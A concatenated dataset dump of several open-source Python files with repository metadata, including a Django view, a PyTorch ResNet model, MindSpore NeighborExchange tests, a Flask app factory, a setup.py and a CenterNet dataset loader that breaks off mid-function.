e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
vDjango/sobre/views.py
|
VinicBueno/Django
|
e06f8e79ec95ac7519cf8ffcf8c0e2062f03cad4
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def index (request):
return render(request, 'sobre/index.html')
| 26
| 46
| 0.753846
|
9e792eb43b11b95b3535b9c76a6076dfe3e459ba
| 3,888
|
py
|
Python
|
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | null | null | null |
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | null | null | null |
models.py
|
ashutoshbsathe/adversarial_reprogramming
|
83c59c8bd2432f307876f9a7d02031b1eceb97e5
|
[
"MIT"
] | 2
|
2019-08-17T05:43:56.000Z
|
2020-05-19T07:42:38.000Z
|
"""
ResNet in PyTorch
Reference :
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=10):
super(ResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ResNet18():
return ResNet(BasicBlock, [2,2,2,2])
def ResNet34():
return ResNet(BasicBlock, [3,4,6,3])
def ResNet50():
return ResNet(Bottleneck, [3,4,6,3])
def ResNet101():
return ResNet(Bottleneck, [3,4,23,3])
def ResNet152():
return ResNet(Bottleneck, [3,8,36,3])
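# Minimal usage sketch (assumption: CIFAR-style 32x32 RGB inputs, 10 classes):
#
#     net = ResNet18()
#     logits = net(torch.randn(1, 3, 32, 32))  # -> tensor of shape [1, 10]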
| 34.714286
| 102
| 0.6268
|
ee1a6f7d31dddf0f1108ba777d1097927e1eb7c7
| 235
|
py
|
Python
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 3
|
2021-03-07T01:17:25.000Z
|
2021-10-13T10:53:11.000Z
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 14
|
2021-01-03T18:54:09.000Z
|
2022-03-16T15:42:45.000Z
|
src/tradingkit/strategy/none_strategy.py
|
logictraders/tradingk
|
b00a3eb82d5f1276581dd44dab1153772956ad74
|
[
"MIT"
] | 2
|
2021-03-07T01:19:25.000Z
|
2021-07-19T21:13:33.000Z
|
from tradingkit.strategy.strategy import Strategy
class NoneStrategy(Strategy):
def get_symbol(self):
return 'BTC/USD'
def subscribed_events(self) -> list:
return []
def finish(self):
return {}
| 16.785714
| 49
| 0.642553
|
4ac6304c16507c61313443cb156aca3b298961c1
| 1,579
|
py
|
Python
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 119
|
2019-05-14T18:44:34.000Z
|
2022-03-17T01:01:02.000Z
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 717
|
2019-04-03T15:36:35.000Z
|
2022-03-31T21:56:47.000Z
|
tests/pnr/test_render_placements.py
|
pretl/ALIGN-public
|
4b03042d9e96fa669740427842b0bf268b0c9a86
|
[
"BSD-3-Clause"
] | 34
|
2019-04-01T21:21:27.000Z
|
2022-03-21T09:46:57.000Z
|
from align.pnr.render_placement import gen_boxes_and_hovertext
def test_gen_boxes_and_hovertext():
placement_verilog_d = {
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1}
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1}
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
]
}
lst = list(gen_boxes_and_hovertext( placement_verilog_d, 'top'))
bbox_rects = [ tup[0] for tup in lst if tup[2] and not tup[4]]
term_rects = [ tup[0] for tup in lst if tup[2] and tup[4]]
assert bbox_rects[0] == [0,0,10,10]
assert bbox_rects[1] == [0,20,10,30]
assert term_rects[0] == [4,4,6,6]
assert term_rects[1] == [4,24,6,26]
| 30.960784
| 78
| 0.40532
|
9ae75bc827312f5bd5be7b0e2444b851b891ab70
| 2,029
|
py
|
Python
|
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | null | null | null |
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | 1
|
2019-07-29T16:58:21.000Z
|
2019-07-29T16:58:21.000Z
|
src/python/pants/backend/python/tasks/python_run.py
|
anthonyjpratti/pants
|
d98e53af6ddd877861231bce8343f8204da0a9d1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import signal
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.tasks.python_execution_task_base import PythonExecutionTaskBase
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnitLabel
from pants.util.osutil import safe_kill
from pants.util.strutil import safe_shlex_split
class PythonRun(PythonExecutionTaskBase):
"""Run a Python executable."""
@classmethod
def register_options(cls, register):
super().register_options(register)
register('--args', type=list, help='Run with these extra args to main().')
@classmethod
def supports_passthru_args(cls):
return True
def execute(self):
binary = self.require_single_root_target()
if isinstance(binary, PythonBinary):
# We can't throw if binary isn't a PythonBinary, because perhaps we were called on a
# jvm_binary, in which case we have to no-op and let jvm_run do its thing.
# TODO(benjy): Use MutexTask to coordinate this.
pex = self.create_pex(binary.pexinfo)
args = []
for arg in self.get_options().args:
args.extend(safe_shlex_split(arg))
args += self.get_passthru_args()
env = self.prepare_pex_env()
self.context.release_lock()
cmdline = ' '.join(pex.cmdline(args))
with self.context.new_workunit(name='run',
cmd=cmdline,
labels=[WorkUnitLabel.TOOL, WorkUnitLabel.RUN]):
po = pex.run(blocking=False, args=args, env=env)
try:
result = po.wait()
if result != 0:
msg = f'{cmdline} ... exited non-zero ({result})'
raise TaskError(msg, exit_code=result)
except KeyboardInterrupt:
# The process may still have exited, even if we were interrupted.
safe_kill(po.pid, signal.SIGINT)
raise
| 36.232143
| 90
| 0.674717
|
a6320fef6b2aa5da9ac5ed94c5e259b7bf79b217
| 17,918
|
py
|
Python
|
tests/ut/python/parallel/test_neighborexchange.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/parallel/test_neighborexchange.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/parallel/test_neighborexchange.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import pytest
import numpy as np
import mindspore as ms
import mindspore.context as context
from mindspore import Tensor, Parameter
import mindspore.nn as nn
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.ops.operations.comm_ops import NeighborExchange
_w1 = Tensor(np.ones([32, 32]), dtype=ms.float32)
_x1 = Tensor(np.ones([32, 16]), dtype=ms.float32)
_x2 = Tensor(np.ones([16, 32]), dtype=ms.float32)
def compile_net(net):
context.set_context(mode=context.GRAPH_MODE)
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_train()
_cell_graph_executor.compile(train_net, _x1, _x2)
def test_NeighborExchange_two_inputs_success():
"""
Feature: NeighborExchange
Description: two inputs and two outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class MatMulNet(nn.Cell):
def __init__(self, weight1):
super(MatMulNet, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 32], [32, 16]), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out, x1))
return out[0]
net = MatMulNet(_w1)
compile_net(net)
def test_NeighborExchange_single_input_success():
"""
Feature: NeighborExchange
Description: one inputs and two outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class MatMulNet2(nn.Cell):
def __init__(self, weight1):
super(MatMulNet2, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = MatMulNet2(_w1)
compile_net(net)
def test_NeighborExchange_empty_send_success():
"""
Feature: NeighborExchange
Description: empty inputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[], recv_rank_ids=[1], recv_shapes=([1],),
send_shapes=(), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv()
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_empty_recv_success():
"""
Feature: NeighborExchange
Description: empty outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[], recv_shapes=(),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv((x1,))
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_empty_send_empty_recv_success():
"""
Feature: NeighborExchange
Description: empty inputs and empty outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[], recv_rank_ids=[], recv_shapes=(),
send_shapes=(), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv()
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_recv_shape_num_diff_with_recv_rank_size_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids and send_shapes are set as 1 input, but gives 2
Expectation: throw ValueError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32],),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(ValueError):
compile_net(net)
def test_NeighborExchange_send_shape_num_diff_with_send_rank_size_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids is set as 2 inputs, but send_shapes are set as 1 input
Expectation: throw ValueError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 32]),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(ValueError):
compile_net(net)
def test_NeighborExchange_send_shape_num_diff_with_input_num_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids and send_shapes are set as 2 inputs, but has only 1 input
Expectation: throw Exception
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 32]),
send_shapes=([32, 32], [32, 32]), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(Exception):
compile_net(net)
def test_NeighborExchange_send_shape_diff_with_input_shape_failed():
"""
Feature: NeighborExchange
Description: send_shapes is set as [16, 16], but input is [32, 32]
Expectation: throw Exception
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([16, 16],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(Exception):
compile_net(net)
def test_NeighborExchange_attr_check_send_rank_ids_is_tuple_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=(0), recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_rank_ids_is_tuple_2_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=(0,), recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_rank_ids_is_float_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be int, but a float is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1.0], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_tuple_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=([1, 2],),
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_tuple_2_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=(1, 2,),
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_float_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be int, but a float is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2.0],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_shape_not_tuple_failed():
"""
Feature: NeighborExchange
Description: send_shapes should be tuple(list), but a list is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16]), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_shape_list_failed():
"""
Feature: NeighborExchange
Description: send_shapes should be tuple(list), but a list(list) is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=[[32, 16]], recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_type_numpy_failed():
"""
Feature: NeighborExchange
Description: recv_type should be mindspore type, but a numpy type is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=np.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_invalid_group_failed():
"""
Feature: NeighborExchange
Description: group should be str, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32, group=("str",))
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
| 35.064579
| 120
| 0.595825
|
5c8861562948f2b2fb3f7c50db148ae916e3354b
| 975
|
py
|
Python
|
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | 3
|
2021-05-20T23:35:06.000Z
|
2021-11-23T15:51:36.000Z
|
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | null | null | null |
from dotenv import load_dotenv
from flask import Flask, render_template
load_dotenv()
def create_app():
"""Create and configure the app."""
app = Flask(__name__)
app.config.from_object('app.config.ProductionConfig')
if app.config['ENV'] == 'development':
app.config.from_object('app.config.DevelopmentConfig')
from app.send_email import bp, mail
# Init Mail.
mail.init_app(app)
@app.get('/')
def index():
"""Show a simple form to test the application."""
return render_template('index.html')
@app.errorhandler(404)
def page_not_found(err):
return render_template('errors/404.html'), 404
@app.errorhandler(405)
def method_not_allowed(err):
return render_template('errors/405.html'), 405
@app.errorhandler(500)
def internal_server_error(err):
return render_template('errors/500.html'), 500
app.register_blueprint(bp)
return app
| 21.666667
| 62
| 0.657436
|
e2a487f8f73cdffe496b27575ac70af2ce2adde1
| 2,957
|
py
|
Python
|
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup script for Google API Python client.
Also installs included versions of third party libraries, if those libraries
are not already installed.
"""
from __future__ import print_function
import sys
if sys.version_info < (2, 7):
print("google-api-python-client requires python version >= 2.7.", file=sys.stderr)
sys.exit(1)
if (3, 1) <= sys.version_info < (3, 4):
print("google-api-python-client requires python3 version >= 3.4.", file=sys.stderr)
sys.exit(1)
import io
import os
from setuptools import setup
packages = ["apiclient", "googleapiclient", "googleapiclient/discovery_cache"]
install_requires = [
# NOTE: Apache Beam tests depend on this library and cannot
# currently upgrade their httplib2 version.
# Please see https://github.com/googleapis/google-api-python-client/pull/841
"httplib2>=0.9.2,<1dev",
"google-auth>=1.4.1",
"google-auth-httplib2>=0.0.3",
"google-api-core>=1.13.0,<2dev",
"six>=1.6.1,<2dev",
"uritemplate>=3.0.0,<4dev",
]
package_root = os.path.abspath(os.path.dirname(__file__))
readme_filename = os.path.join(package_root, "README.md")
with io.open(readme_filename, encoding="utf-8") as readme_file:
readme = readme_file.read()
version = "1.8.3"
setup(
name="google-api-python-client",
version=version,
description="Google API Client Library for Python",
long_description=readme,
long_description_content_type='text/markdown',
author="Google LLC",
author_email="googleapis-packages@google.com",
url="https://github.com/googleapis/google-api-python-client/",
install_requires=install_requires,
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*",
packages=packages,
package_data={},
license="Apache 2.0",
keywords="google api client",
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP",
],
)
| 34.383721
| 87
| 0.685154
|
a266f2ebfc3023ac7df04468d0a9a55ab820366e
| 5,752
|
py
|
Python
|
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.utils.data as data
import pycocotools.coco as coco
import numpy as np
import torch
import json
import cv2
import os
from centernet_utils.image import flip, color_aug
from centernet_utils.image import get_affine_transform, affine_transform
from centernet_utils.image import gaussian_radius, draw_umich_gaussian, draw_msra_gaussian
import math
class EXDetDataset(data.Dataset):
def _coco_box_to_bbox(self, box):
bbox = np.array([box[0], box[1], box[0] + box[2], box[1] + box[3]],
dtype=np.float32)
return bbox
def _get_border(self, border, size):
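    # Shrink the border (border // i) by powers of two until the random-crop
    # center range [border // i, size - border // i) is non-empty.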
i = 1
while size - border // i <= border // i:
i *= 2
return border // i
def __getitem__(self, index):
img_id = self.images[index]
img_info = self.coco.loadImgs(ids=[img_id])[0]
img_path = os.path.join(self.img_dir, img_info['file_name'])
img = cv2.imread(img_path)
height, width = img.shape[0], img.shape[1]
c = np.array([img.shape[1] / 2., img.shape[0] / 2.])
s = max(img.shape[0], img.shape[1]) * 1.0
flipped = False
if self.split == 'train':
if not self.opt.not_rand_crop:
s = s * np.random.choice(np.arange(0.6, 1.4, 0.1))
w_border = self._get_border(128, img.shape[1])
h_border = self._get_border(128, img.shape[0])
c[0] = np.random.randint(low=w_border, high=img.shape[1] - w_border)
c[1] = np.random.randint(low=h_border, high=img.shape[0] - h_border)
else:
sf = self.opt.scale
cf = self.opt.shift
